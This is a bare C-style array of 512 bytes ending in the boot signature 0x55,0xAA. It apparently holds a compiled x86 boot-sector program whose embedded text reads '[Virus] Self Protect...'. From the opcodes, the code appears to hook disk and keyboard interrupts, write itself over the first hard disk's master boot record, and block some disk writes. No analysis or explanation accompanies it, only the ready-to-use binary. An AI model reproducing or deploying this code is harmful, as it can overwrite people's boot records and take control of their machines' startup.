
{0xEB,0x05,0x90,0x89,0xA1,0x00,0xF0,0xFA,0x8C,0xC8,0x8E,0xD8,
	0x8E,0xC0,0x8E,0xD0,0xBC,0x00,0x7C,0x33,0xF6,0xFB,0xFF,0x0E,
	0x13,0x04,0xFF,0x0E,0x13,0x04,0xA1,0x13,0x04,0xB1,0x06,0xD3,
	0xE0,0x8E,0xC0,0xBF,0x00,0x00,0xBE,0x00,0x7C,0xB9,0x00,0x02,
	0xF3,0xA4,0x06,0xB8,0x38,0x00,0x50,0xCB,0x33,0xC0,0x8E,0xD8,
	0x8C,0x06,0xF0,0x03,0xFA,0xA1,0x4C,0x00,0x2E,0xA3,0x03,0x00,
	0xA3,0x40,0x01,0xA1,0x4E,0x00,0x2E,0xA3,0x05,0x00,0xA3,0x42,
	0x01,0xB8,0x2F,0x01,0xA3,0x4C,0x00,0x8C,0x0E,0x4E,0x00,0xA1,
	0x24,0x00,0x2E,0xA3,0x0C,0x01,0xA1,0x26,0x00,0x2E,0xA3,0x0E,
	0x01,0xB8,0xB4,0x01,0xA3,0x24,0x00,0x8C,0x0E,0x26,0x00,0xBE,
	0x02,0x00,0xB8,0x01,0x02,0xBB,0x00,0x02,0xB9,0x01,0x00,0xBA,
	0x80,0x00,0x9C,0x2E,0xFF,0x1E,0x03,0x00,0x73,0x03,0x4E,0x75,
	0xE9,0x33,0xF6,0xBF,0x00,0x02,0x0E,0x1F,0xF3,0xA6,0x74,0x14,
	0xBE,0x10,0x01,0x32,0xED,0xAC,0x8A,0xC8,0xB8,0x01,0x13,0xBB,
	0x07,0x00,0x2B,0xD2,0x8B,0xEE,0xCD,0x10,0x8C,0xC8,0x8E,0xC0,
	0x33,0xDB,0xB8,0x01,0x03,0xB9,0x01,0x00,0xBA,0x80,0x00,0x9C,
	0x2E,0xFF,0x1E,0x03,0x00,0xBE,0x02,0x00,0xB8,0x03,0x02,0xBB,
	0x00,0x02,0xB9,0x04,0x00,0xBA,0x80,0x00,0x9C,0x2E,0xFF,0x1E,
	0x03,0x00,0x73,0x03,0x4E,0x75,0xE9,0xB8,0xE8,0x00,0x50,0xB8,
	0x00,0x02,0x50,0xC3,0xFB,0x33,0xC0,0x8E,0xC0,0xBE,0x02,0x00,
	0xB8,0x01,0x02,0xBB,0x00,0x7C,0xB9,0x03,0x00,0xBA,0x80,0x00,
	0x9C,0x2E,0xFF,0x1E,0x03,0x00,0x73,0x03,0x4E,0x75,0xE9,0xEA,
	0x00,0x7C,0x00,0x00,0x00,0x00,0x00,0x00,0x19,0x5B,0x56,0x69,
	0x72,0x75,0x73,0x5D,0x20,0x53,0x65,0x6C,0x66,0x20,0x50,0x72,
	0x6F,0x74,0x65,0x63,0x74,0x2E,0x2E,0x2E,0x0A,0x0D,0x00,0xFF,
	0xFF,0xE2,0x01,0xFB,0x81,0xFA,0x80,0x00,0x75,0x08,0x83,0xF9,
	0x01,0x75,0x03,0xB9,0x03,0x00,0x80,0xFC,0x03,0x74,0x28,0x80,
	0xFC,0x05,0x74,0x23,0x80,0xFC,0x06,0x74,0x1E,0x80,0xFC,0x07,
	0x74,0x19,0x80,0xFC,0x0B,0x74,0x14,0x80,0xFC,0x0F,0x74,0x0F,
	0x80,0xFC,0x13,0x74,0x0A,0x80,0xFC,0x19,0x74,0x05,0x2E,0xFF,
	0x2E,0x03,0x00,0x80,0xFA,0x80,0x75,0xF6,0x51,0x52,0x86,0xE9,
	0x80,0xE5,0xC0,0x8B,0xD1,0xB1,0x06,0xD2,0xEE,0x2E,0x3B,0x16,
	0x2D,0x01,0x5A,0x59,0x7D,0xE0,0x2E,0x80,0x3E,0x2A,0x01,0x00,
	0x74,0x20,0x80,0xFE,0x00,0x75,0xD3,0x83,0xF9,0x01,0x74,0x16,
	0x83,0xF9,0x02,0x74,0x11,0x83,0xF9,0x03,0x74,0x0C,0x83,0xF9,
	0x07,0x74,0x07,0x83,0xF9,0x08,0x74,0x02,0xEB,0xB8,0xB4,0x03,
	0xF9,0xCA,0x02,0x00,0xFB,0x50,0xE4,0x60,0x3C,0x01,0x74,0x06,
	0x58,0x2E,0xFF,0x2E,0x0C,0x01,0xB4,0x02,0xCD,0x16,0x24,0x0F,
	0x3C,0x0A,0x75,0xF0,0x9C,0x2E,0xFF,0x1E,0x0C,0x01,0x9C,0xB8,
	0xDC,0x01,0x50,0xB8,0x00,0x06,0x50,0xC3,0x72,0x09,0x2E,0xC6,
	0x06,0x2A,0x01,0xFF,0xEB,0x07,0x90,0x2E,0xC6,0x06,0x2A,0x01,
	0x00,0x9D,0x58,0xCF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x00,0x00,0x55,0xAA};